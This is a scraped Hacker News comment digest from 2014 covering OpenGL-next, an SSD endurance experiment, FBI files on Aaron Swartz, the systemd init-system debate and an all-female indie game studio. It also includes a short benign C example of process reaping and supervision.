OpenGL is now available to more people than ever. By an exponential amount.

It is supported by all major browsers. From IE, to Firefox, to Chrome, to Android, to iOS, and more.

12
BadassFractal 3 days ago 6 replies      
The saying is that total rewrites are always a bad idea. It'll be interesting to see if this one would be an exception to the rule.
13
shmerl 3 days ago 0 replies      
Is there any ETA for OpenGL-next?
14
Stolpe 3 days ago 0 replies      
So basically, "OpenGL in 2015" will be great!
15
_random_ 3 days ago 0 replies      
Whoever doesn't force me to use C/C++ or JavaScript.
27
The SSD Endurance Experiment: Only Two Remain After 1.5PB
254 points by ferrari8608  1 day ago   104 comments top 21
1
tytso 1 day ago 3 replies      
The definition of wear out is more than just the SSD declaring the cell bad, or the SSD failing suddenly. A cell is technically declared worn out when the chance that the cell suffers charge leakage after N months at temperature T exceeds probability P. (Exactly what these parameters are is a secret that the SSD vendors don't disclose. There are some standards, but the SSD vendors don't necessarily use those standards when they make promises about their product's wear endurance.)

So even though an SSD might last for 1.5 PB's worth of writes, there is no guarantee that if you were to then put the SSD on a shelf and wait nine months, that the data will still be good. This is probably one reason some vendors will declare themselves to be dead after so many gigabytes worth of writes, even if the flash cells haven't "failed" yet. Otherwise users might depend on the SSD's contents being retained, when in fact they might suffer data loss.

But of course, this doesn't really matter much, because you treat all data stored on SSD's as a cache, and do regular backups, RIGHT? :-)

2
userbinator 1 day ago 1 reply      
The main issue I have with this form of testing is that it's basically measuring the ultimate endurance characteristics of the flash - running program/erase cycles until some piece of the flash becomes completely unusable. The majority of the time the first failure will occur in a user data block, but there's a nonzero chance that it's in a block mapping table or the firmware itself, and that will definitely cause catastrophic failure. The article seems to be implying that it's OK to write more data than the manufacturer specifies, but this is not something anyone should ever be doing in a real-world scenario, because retention is inversely proportional to endurance and also (exponentially!) to temperature. A drive that retains data for a week at 20C may not be able to at 30C or even 25C.

The 840 Pro's reallocated sector count appears to have started rising at 600TB, which is roughly 2400 P/E cycles, on average, of the whole flash - this is not surprising and agrees with the typical endurance figure of 2K-3K for 2x nm MLC.

I've never agreed fully with the reasoning behind MLC - yes, it's technically twice the capacity for the same die area/price as SLC (or alternatively, half the area/price for the same capacity), but it's also nearly two orders of magnitude less endurance/retention and requires far more controller complexity for error correction and bad-block management. In a storage device, I think reliability is more important than capacity - even with backups, no one wants to lose any data. The tradeoff doesn't make so much sense to me - theoretically, you could buy an MLC SSD that wears out after a few years (thus needing to replace it and copy the existing data over to the new one, along with all the risks that causes, etc.), or for only twice as much, an SLC one that probably won't ever need replacing.

A 256GB SLC SSD with 100K P/E cycle flash is conceivably good for 25PB and 5-10 years, or <1PB and over a century... i.e. you could probably use one for archival if stored in a good environment. Part of me thinks the manufacturers just don't want to make such long-lasting products, hence the strong association of SLC to "enterprise" products. (And the much higher pricing of SLC SSDs, more than the raw price of NAND would suggest.)

3
Retric 1 day ago 3 replies      
I normally find it annoying when they run endurance tests like this using only one drive of each brand and treat the results as particularly meaningful. However, in this case I think the failures may suggest things about the drives' underlying architecture, not just who picked the best sample from the bin.
4
joshvm 1 day ago 3 replies      
This is encouraging although even tests on early drives showed that an 'average' drive should last far longer than people need them for - purely based on the number of allowed writes. 750TB? That's more data than my department, an imaging research group, have on our cluster...

There are some more tests which are very hard to do because you need time and a large sample size, for instance what's the data retention time for a typical SSD?

As far as I can tell, nobody really knows because you'd need to leave the drive off for probably more than a year - and as soon as you turn the drive on, presumably you refresh the charge that's leaked out? Most of the time this isn't a problem because almost everyone turns on their PC or laptop weekly/monthly if not daily.

5
callesgg 1 day ago 4 replies      
So not entering read only mode after life end seems like a very dangerous bug that is not really acceptable.

Sidenote: Articles like this always scare the shit out of me. I have a Kingston SSD that has been in my main server for almost 3 years now.

The SMART data seems to say that it is 100% fine but as it has been on for 24* 365*3 hours that seems unlikely.

6
devindotcom 1 day ago 1 reply      
I kind of anthropomorphize the devices in tests like this, so it's a bit sad to see the poor things made to run until their legs fall off. But it's nice to know they run farther than expected.
7
qwerta 20 hours ago 1 reply      
There was a test at the Czech site diit.cz. The SSD survived several overwrites. But after it was left disconnected for several months without power, it lost all data. Apparently an SSD needs to repower its cells periodically.
8
colordrops 1 day ago 0 replies      
The fact that they work better than spec indicates to me that we are still at the forefront of this technology with good engineering effort behind it. Once it matures and companies try to squeeze out every dollar, expect them to fail a lot more and the MTBF to be less than advertised, similar to printers etc
9
scrollaway 1 day ago 1 reply      
It'd be nice to get some endurance testing on the sandisk internal solid state drives (eg. http://www.amazon.com/Sandisk-SDSA5JK-064G-Module-Laptop-Net...)

I've had one fail three days ago on a laptop that was barely a year old. I'm not even sure what actually failed - debugging a broken ssd is a pain, and when I mount it it just freezes for ages, making the matter worse.

Sandisk being the only real seller of those things there isn't exactly a lot of competition but I'd like to actually see how they hold up vs. regular SSDs. There is a bit of a false expectation when you buy a laptop with a ssd, expecting the endurance of a regular ssd and getting something potentially awfully bad.

10
kalleboo 1 day ago 1 reply      
I'm happy to see the high write longevity these drives are achieving, but it frightens me a lot that it seems like the fail-safes where they're designed to go into read-only mode instead of just dropping off the controller and losing your data are failing on all of them, even the Intel!
11
Aoyagi 1 day ago 1 reply      
I wish the number of samples was much, much higher...
12
TheLoneWolfling 1 day ago 1 reply      
I am concerned about the lack of read-only at EOL.

I, for one, would much prefer slightly less longevity and better reliability than vice versa.

I mean, I do backups, but backups only do so much.

13
abvdasker 10 hours ago 0 replies      
Really excellent writing on these pieces. I lol'd at "dutifully bricked itself". If only all tech writing were as colorfully engaging.
14
jcampbell1 1 day ago 1 reply      
These SSDs are failing at roughly 3000 write-out cycles. Traditional hard drives can take 6 hours to write out, so doing a similar test would take ~2 years.

Spinning disks are so freaking slow that you could never test the reliability apples-to-apples. Any workload that wears out an SSD could never be run on a traditional HD.

15
arenaninja 1 day ago 2 replies      
Does anyone know if there's a utility that monitors SSD health? I've a 512GB SSD, which I'll probably keep for a while, but I don't like being in the dark about how far along its lifetime I am
16
alecco 1 day ago 1 reply      
I can't find in the article if those were sequential 1.5PB writes or random small writes (i.e. < 4KB). If the latter case, this article should be flagged.
17
listic 1 day ago 1 reply      
They should have included Samsung 850 Pro, which sells since August. http://smile.amazon.com/s/ref=nb_sb_ss_c_0_7?url=search-alia...
18
ck2 1 day ago 1 reply      
The intel failed to reach the petabyte mark.

This is interesting because many datacenters use the intel.

19
higherpurpose 1 day ago 0 replies      
I wish they tested a Crucial drive, too. Crucial drives tend to have great dollar/GB ratio.
20
NoMoreNicksLeft 11 hours ago 0 replies      
If an SSD is written to once, and kept powered on (and at a temperature in the low 70s), while getting regular reads, how long can I expect this drive to last?

If that drive is powered on, but kept at low temperatures (say near or below freezing), does this help it survive longer?

What failure modes would occur in such an environment? Would it just be power surges frying the thing, static electricity?

21
gambiting 19 hours ago 0 replies      
I've always been curious - I understand that memory cells have their own durability, but how about the controllers that are used to transfer that data? Do they wear out too? In fact, can a CPU fail after having exabytes of data sent through it?
28
FBI and Secret Service Files: Aaron Swartz
267 points by signa11  4 days ago   127 comments top 7
1
pocketheyman 4 days ago 2 replies      
Kind of interesting, according to the case file, the PACER records were being pulled en masse during normal court hours (typically when courts are also accessing the PACER database). A user noticed that PACER was going slow and notified PACER of the apparent slowness. Looks like they investigated, shut the PACER system down and were able to detect the requests were coming from an Amazon Web Hosting account linked to Swartz.

I find this interesting because it wasn't some flag on the PACER system screaming "HEY SOMEONE IS DOWNLOADING THESE EVERY TWO SECONDS" but instead was noticed because some law clerk was irritated at how slow the server was at responding.

2
manifesto 4 days ago 7 replies      
A reminder: the petition https://petitions.whitehouse.gov/petition/remove-united-stat... has not been responded to yet, after more than one and a half years.
3
nutate 4 days ago 4 replies      
Was there ever an argument beyond 'information wants to be free' to this? Let's say PACER docs were being pulled and hosted elsewhere. What if case information was updated as per part of the legal process, aka person X is now innocent. How does this change to past case documents get propagated to the 'illegal' mirror?

This is interesting because I think we do want an authoritative document store and that, yes, we hence need to pay for its upkeep. So if he had mirrored and hosted all of these cases, they would've been merely snapshots of past history, not the curated corpus that PACER has.

The same could be said of scientific papers where large retractions are handled by the journals, but may be lost by some mirrors.

Information quality, provenance and current validity is more important than the trope of 'wanting to be free.' Once information passes into the 'historical' realm, perhaps it should/must be free, but when we are in the malleable phase it's irresponsible to 'mirror once' without knowing how to get pushed (or pull) updates.

Look at how the Linux kernel mirror system works, push mirroring, etc. The scrape method doesn't pass the smell test if you really want to provide a service beyond point in time archiving (aka archive.org).

Regarding depression, suicide and unfair persecution I'll withhold comment.

4
vajorie 4 days ago 2 replies      
How come no one even bothered to remove his full address and ssn from the records?.. On the other hand, even the very names of people who approved and drafted the documents are removed.
5
herge 4 days ago 1 reply      
Wait, were the case files for Aaron Swartz classified or just never made public? What would be the reasoning for classifying his case? How was he a threat to national security?
6
yuhong 4 days ago 1 reply      
On PACER fees, IMO a good compromise is to only charge for the actual court documents retrieved. No charging for search results, docket listings etc, and there is already a $3 cap on documents.
7
jdong 4 days ago 3 replies      
What makes this case such a big deal? Swartz did something that was obviously illegal and got caught.
29
Why systemd?
233 points by jamesog  2 days ago   252 comments top 11
1
uselessdguy 2 days ago 6 replies      
Disclaimer: I develop uselessd, probably have a warped mindset from being a Luddite who values transparency, and evil stuff like that.

The author of this piece makes the classic mistake of equating the init system as the process manager and process supervisor. These are, in fact, all separate stages. The init system runs as PID 1 and strictly speaking, the sole responsibility is to daemonize, reap its children, set the session and process group IDs, and optionally exec the process manager. The process manager then defines a basic framework for stopping, starting, restarting and checking status for services, at a minimum. The process supervisor then applies resource limits (or even has those as separate tools, like perp does with its runtools), process monitoring (whether through ptrace(2), cgroups, PID files, jails or whatnot), autorestart, inotify(7)/kqueue handlers, system load diagnostics and so forth. The shutdown stage is another separate part, often handled either in the initd or the process manager. Often, it just hooks to the argv[0] of standard tools like halt, reboot, poweroff, shutdown to execute killall routines, detach mount points, etc.

To stuff everything in the init system, I'd argue, is bad design. One must delegate, whether to auxiliary daemons, shell scripts, configuration syntax (in turn read and processed by daemons) or what have you.

sysvinit is certainly inadequate. The inittab is cryptic and clunky, and runlevels are a needlessly restrictive concept to express what is essentially a named service group that can be isolated/overlayed.

Of course, to start services on socket connections, you either use (x)inetd, or you reimplement a subset or (partial or otherwise) superset of it. There's no way around this, it's choosing to handle more on your own rather than delegate. In systemd's case, they do this to support socket families like AF_NETLINK.

As for systemd being documented, I'd say it's quite mediocre. The manpages proved to be inconsistent and incomplete, and for anyone but an end user or a minimally invested sysadmin, of little use whatsoever. Quantity is nice, but the quality department is lacking.

sysvinit's baroque and arduous shell scripts are not the fault of using shell scripts as a service medium, but have to deal with sysvinit's aforementioned cruft (inittab and runlevels) and the historical lack of any standard modules. BSD init has the latter in the form of /etc/rc.subr, which implements essential functions like rc_cmd and wait_for_pids. Exact functions vary from BSD to BSD, but more often than not, BSD init services are even shorter than systemd services: averaging 3-4 lines of code.

A unified logging sink is nothing novel, it's just that systemd is the first of its kind that gained momentum, but with its own unique set of issues. syslogd and kmsg were still passable, and the former also seamlessly integrated itself with databases.

Once again, changing the execution environment is a separate stage and has multiple ways of being done. Init-agnostic tools that wrap around syscalls are probably my favorite, but YMMV.

As for containers, it's about time Linux caught up to Solaris and FreeBSD.
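
An added example, not part of the comment above and not code from any init project: a C sketch of the stage split the comment describes, with zombie reaping (the init's duty) kept apart from restart-on-failure (the supervisor's duty). The names `reap_all`, `supervise`, `flaky_service` and `spawn_exiting_children` are hypothetical, and the sample service is constructed for the demonstration.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Init stage: block until every child is collected; returns the count. */
int reap_all(void)
{
    int reaped = 0;
    for (;;) {
        if (waitpid(-1, NULL, 0) > 0) reaped++;
        else if (errno != EINTR) return reaped;   /* ECHILD: none left */
    }
}

/* Supervisor stage: run service in its own session; restart after a non-zero
 * exit, at most max_restarts times. Returns starts; *last = last exit code. */
int supervise(int (*service)(int attempt), int max_restarts, int *last)
{
    int starts = 0, status;
    pid_t pid, w;
    signal(SIGCHLD, SIG_DFL);   /* an inherited SIG_IGN discards statuses */
    *last = -1;                 /* -1: no exit code seen (signal, error) */
    while (starts <= max_restarts && (pid = fork()) >= 0) {
        if (pid == 0) {
            setsid();           /* new session and process group */
            _exit(service(starts));
        }
        starts++;
        do w = waitpid(pid, &status, 0); while (w < 0 && errno == EINTR);
        *last = (w == pid && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
        if (*last == 0) break;  /* clean exit, nothing to restart */
    }
    return starts;
}

/* Constructed sample service: fails on attempts 0 and 1, then succeeds. */
int flaky_service(int attempt) { return attempt < 2 ? 1 : 0; }

/* Constructed helper: fork n children that exit at once (future zombies). */
int spawn_exiting_children(int n)
{
    int spawned = 0;
    signal(SIGCHLD, SIG_DFL);
    while (n-- > 0) {
        pid_t pid = fork();
        if (pid == 0) _exit(0);
        spawned += pid > 0;
    }
    return spawned;
}

int main(void)
{
    int last, starts = supervise(flaky_service, 5, &last);
    printf("starts=%d last=%d reaped=%d\n", starts, last,
           spawn_exiting_children(3) ? reap_all() : 0);
    return 0;
}
```

The restart policy lives entirely in `supervise`, so `reap_all` stays small enough to audit, which is the delegation argument in miniature.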

2
Sanddancer 2 days ago 2 replies      
I think part of systemd's problem, as much as Poettering et al will try to deny it, is that it is full of NIH. One of the things this post criticizes, and Poettering criticizes, is the BSD-inherited daemon() function. Being curious, I looked at the function's implementation, both in FreeBSD's implementation, and glibc's implementation. FreeBSD's implementation handles pretty much everything the daemon writer themself would want to -- it sets the signal handlers and masks appropriately, double forks, creates a session, sets PIDs unless you tell it not to, and changes to the root directory unless you tell it not to. Glibc's misses important steps, like the signal manipulations, tries too hard to create a typical null device, and otherwise completely misses the point.

The biggest problem I see with systemd is that the developers don't play well with others. Instead of working with various parties, like the glibc maintainers, to fix deficiencies elsewhere, they expect developers everywhere to drop what they're doing to redesign how their projects work, when they work just fine for the many, many other unix architectures out there. Too much of systemd is based on magical pixie dust, compatibility be damned, and not enough on actually making things better.

3
dsr_ 2 days ago 4 replies      
The reason people use UNIX-like systems is because they work reliably. In order to make a complex system work reliably, it needs to be easily fixed. In order to fix a system, a person needs to understand it as well as be able to make a change in it. And in order to understand a system, it helps very much if that system is straightforward and lucidly verbose.

I hope systemd will live or die on its merits; I fear that it will take over via politicking.

4
nextos 2 days ago 5 replies      
We often criticise systemd for being too bloated, and making it hard to write a drop in replacement. I totally agree with this line of thought.

However, in my mind it has made several awesome things possible. My boot time got dramatically shorter when I adopted it thanks to parallelization. Besides, daemons have now simple and robust service definitions. Sys V had become a mess!

Lastly, lightweight containers are the real-deal for small development tasks (not for production!). Just one command: systemd-nspawn, and you're ready to go. Docker is currently a bit more complicated to set up.

Arguably, many features, including containers, should be moved out of systemd. Right now, more than a monolithic architecture, I think systemd is rather shipping too many things under the same project umbrella.

5
mhogomchungu 2 days ago 4 replies      
Lots of people do not seem to understand the criticism of systemd.

systemd = init system + a whole lot of other things.

When people complain about systemd, they usually do not complain about what it does or how it does it in the init system part. That part is pretty solid as far as functionality is concerned.

When people complain about systemd, they usually complain about the "whole lot of other things" part. Lots of people have different complaints and my biggest one is on udev.

udev is a core component in any modern linux system. I see systemd absorbing it as nothing but a political move and a power grab. They could have left udev as an independent project and just created a dependency on it.

The "whole lot of other things part" will, by definition, make any other project that is just an init system seem very much deficient in functionality when compared to systemd.

6
ultramancool 2 days ago 5 replies      
Am I the only one who's disgusted with this bloated, convoluted, dbus-dependent pile of crap? I mean, c'mon, binary log files? I'll pass, thanks. It replaces way more than it needed to.

I prefer the BSD-style philosophy, nice, simple rc.conf, used to run Arch till it got infected with this garbage too. It slowly progressed away from its BSD-style roots. So recently, I just gave up and moved to FreeBSD. Not a single regret so far.

7
dschiptsov 1 day ago 3 replies      
Out of confused mind.)

There is no fundamental problem that it "solves" which other UNIXes presumably still do have. The problem does not exist. AIX, Solaris, *BSD and many old-school Linux guys will tell you that.

Also, any old-school guy will tell you that a kitchen-sink, put-it-all-in design is a wrong way.

btw, user processes supervision is a task of an OS kernel, which it handles via a bunch of specialized syscalls, not of some "man-in-the-middle" user-level daemons.

There is actually nothing to talk about, except some ambitions and bad designs.

8
fsniper 19 hours ago 0 replies      
I'm new on the boat about systemd debate so I'm still reading and reviewing the situation. But the more I read the more I'm getting away from systemd.

In principle everybody is on terms with the need for a new and modern init system. But yet I'm not even sold on this issue. sysvinit is still holding stance with extra tools and doing its job cleanly. By introducing a fully reimplemented and still controversial system with many dependencies and with need for many reimplementation on our existing software we are not helping the issue but blurring the waters.

And what's the fascination about boot times?

Nowadays on desktops nobody boots. You just boot once and hibernate/suspend forever. And for servers, if you are rebooting you are doing something wrong. So pulling efforts from building controversial init systems to optimize hibernate/suspend in the kernel would be a better effort on this field.

9
callesgg 2 days ago 1 reply      
I think systemd actually clears up a lot of stuff. As the article describes.

The main thing that scares me is the binary logging format. I can think of some benefits but mostly it just seems scary. I guess I will get to see later if the benefits outweigh the rest.

10
stephen_g 1 day ago 0 replies      
There's a lot of negativity going on here...

As far as my experience goes, I've found it actually works really well on all the servers I've moved to CentOS 7 and on the Fedora desktop I play around with (my main dev machines are Macs) it's significantly improved boot time...

I'm sure there are some valid concerns about design and such, but as far as my usage in production goes, I can't say I've had a single problem with it... It makes it a lot easier when I need to write files than the messy init scripts before also.

11
contingencies 1 day ago 0 replies      
Case in point .. today .. rebuilding an X11 desktop system on Gentoo, some weird set of dependencies around gnome beneath the window manager wants to pull in systemd. I finally work out a way around it, but it wastes half an hour of my time.

My take: Containers are not well managed by general, daemon-oriented process supervisors with a localhost-oriented purview. However, those supervisors would do well to use container-related features to better secure and manage daemons as appropriate. In future, processes will be more likely managed across clusters by parallel capable supervisory systems with high availability goals and network infrastructure configuration, load and topology knowledge. Less and less people will even see the init system, except perhaps behind a logo or as it flashes past while booting their device in debug mode.

(Edit: stumbled on http://www.gossamer-threads.com/lists/gentoo/user/284741 which explains the scenario .. would hate to be on BSD)

30
Faced with change, an all-female indie dev team evolves to a higher form (2013)
223 points by hnal943  5 days ago   196 comments top 16
1
dgreensp 5 days ago 6 replies      
I'm certain that if I had children, I would be failing at my job.

I've hit my 30s, a period when it seems as if all of my friends suddenly have kids. That's a priority shift completely incompatible with my goals. Startups require that you give it all or go home, routinely requiring long nights, longer weekends, and blood and toil. If you aren't willing to put in the hours, eager replacements are standing behind you. If I fail, the women I work with will be out of their jobs.

It's this fearful attitude, lurking in the minds of bosses and employees, that is the problem facing women in the workplace who want to have children, more than anything else. (For example, I put it at the root of poor leave policies.) It's called sexism when it comes from a man, but here (from a female boss) it's clear it's just culture (American culture?).

I just had my first kid, and my wife had to go back to work at six weeks. I'm a software engineer, and she's a medical device rep in trauma. Unlike me, she can't work from home, she carries a pager, and she can't choose her work hours or reduce them. She wasn't itching to go back to work either; she loved being at home with the new baby. However, you do what you have to do. Some new moms do quit their jobs, especially if they weren't making much more than they'd save on childcare by staying at home, or if it was a crappy work environment or an unfulfilling role anyway. However, for many, it's not an option not to work, and being a software developer is actually a pretty cushy gig that I would wish on moms everywhere.

If you're afraid for yourself or someone else of having kids, go out and talk to some power moms.

2
mikeleeorg 5 days ago 0 replies      
I'm pleasantly surprised the comments here aren't overly caustic.

And I really liked this article. As an entrepreneur who has structured my life around my family (i.e. work from home, flexible hours), I can empathize with Brianna and Amanda's points of views. The entrepreneur in me is obsessed with development and deadlines and shipping. The father in me is obsessed with spending time with my daughter. There are times when both are at odds, and while I like to say I always make the right decision, I don't. It's a tough struggle. And it's a struggle I am very conscious of, because I have competitors who don't have or want to deal with similar constraints.

But honestly, I often think these constraints make me a better entrepreneur than I used to be, because I am forced to be strict about my priorities and time. If something is a waste of time, I don't give it a second glance and move on to something else (HN notwithstanding, ahem).

3
up_and_up 5 days ago 1 reply      
> I'm certain that if I had children, I would be failing at my job.

Quality not quantity.

I work as an engineer for an NYC startup and have 3 kids. No, it's not easy, but yes you need to reset your priorities. Life becomes more focused on fewer activities. Once the kids get a bit bigger it's not as time intensive.

I work roughly 6:30am - 8:30am and then 10am - 5pm M-F.

I have many other friends who are engineers at fast moving companies with 2,3,4 or more kids. It's definitely doable.

If your company is asking you to work hours and hours maybe there is something wrong with their product development process or business plan.

Stop worrying and start procreating!

4
mutagen 5 days ago 1 reply      
I'm glad I read this despite the link title, which is appropriately based on the article's sub-title (The title, "Choose Your Character", is even less descriptive). The article hits on some of the startup and indie gamedev work-life balance issues that affect everyone and some unique to women.
5
melling 5 days ago 0 replies      
I believe this team was interviewed on Debug.

http://www.imore.com/debug-44-brianna-wu-amanda-warner-and-r...

6
hrktb 5 days ago 0 replies      
A bit OT, but I think it's refreshing to have a character like her in the tech scene, vocal and taking the spotlight in a lot of places.

At first I was thrown off by the very douchy looking attitude, it felt too much like overcompensating. And I'd hate to work in her company for so many reasons, the burning startup mindset being the main one.

But this article, as her Debug interview or the Isometricshow podcast also show other facets that are pretty fair, balanced and well thought. The podcast particularly brings hilarious and soul crushing moments alternatively, I'd recommend to anyone wanting to hear something a bit different.

7
incision 5 days ago 0 replies      
I'd liken worries about staying productive while raising children to worries about being able to run a marathon.

You're probably safely certain you couldn't do it tomorrow, but that says little about your ability to do it 9 months from now and nothing about what the next person is capable of.

Ask around and you'll find supremely productive people who do both.

8
jbrooksuk 5 days ago 1 reply      
Wow! It's lovely to see Brianna doing well, I interviewed her back in 2012 - http://james-brooks.uk/interview-with-brianna-wu/

:)

9
robertfw 5 days ago 3 replies      
Here is the game in question: http://www.revolution60.com/

The feedback in the article was spot on. The characters look decidedly anorexic.

10
wmeredith 5 days ago 1 reply      
Regardless of subject matter, hot damn this person can write. I hope she's putting some of that spark into her games. That was riveting.
11
Paul-ish 5 days ago 2 replies      
How has the game and her indie studio fared today?
12
DarkIye 2 days ago 0 replies      
This article is really long and has no easily discernable point. Can someone highlight it?
13
spopejoy 5 days ago 2 replies      
It's completely hilarious that this article would bring the anti-PC haters out of their cave. There is absolutely nothing in this article about PC, it breaks the script in numerous ways:

- referring to her employees as "girls" instead of women

- her conflicts about her employee's pregnancy

- fretting over the attention to female-image issues in games, wondering if "the only way to win this game is not to have women at all"

I guess as long as a tech writer dares to use the female first person, HN will be deluged with comments from "gahh I HATE politics" know-nothings plus their more anti-social brethren. It's even curious there would be such focus on the boss being childless, this is so not the point of the article. I would probably criticize her cheezy i'm-so-rad-on-my-red-motorbike aesthetic before even thinking about gender stuff.

If there's a bright side to all the defensiveness, it suggests that the recent focus on gender is working. Much like the Anita Hill hearings brought out all sorts of ugliness out on the way to sensible anti-harassment policies, we're witnessing the next evolution.

14
metafex 5 days ago 5 replies      
It's silly how much goes into correctness in games nowadays. You'd have to make an Asteroids clone just not to offend anybody (except sentient asteroids...).

Just make your game fun, challenging or whatever your goal is and have fun making it. And of course you can put in interesting looking characters, it's called art :)

Also, to the politics topic: Oh I hate that so much, it only takes one person to mess up whole teams and the worst thing is if it's one of your superiors. It's horrible when you can't do anything but change your job (been there, done that).

edit: to the downvoters, please read the whole thing and my response down there, if you still disagree, no hard feelings :)

edit 2: From the article, one of the points I was referring to

"Why are they all white? sneered a liberal friend of mine before launching into a 20-minute screed about how offended he was by the naked shower scene in Heavy Rain."

15
wmt 4 days ago 0 replies      
Are you sure you're on the right forum? The kind of hateful comments your every comment appears to be are not needed here.
16
foobarbecue 5 days ago 0 replies      
By "aspirational" I suppose she meant "inspirational"?

(As for the article itself, I only made it through a few paragraphs. I assume it was going to be about sexism and reproductive discrimination in the workplace, which I think is a serious problem. Part of this problem is solved in Sweden, where a couple can split maternity / paternity leave any way they like.)

       cached 25 September 2014 04:11:01 GMT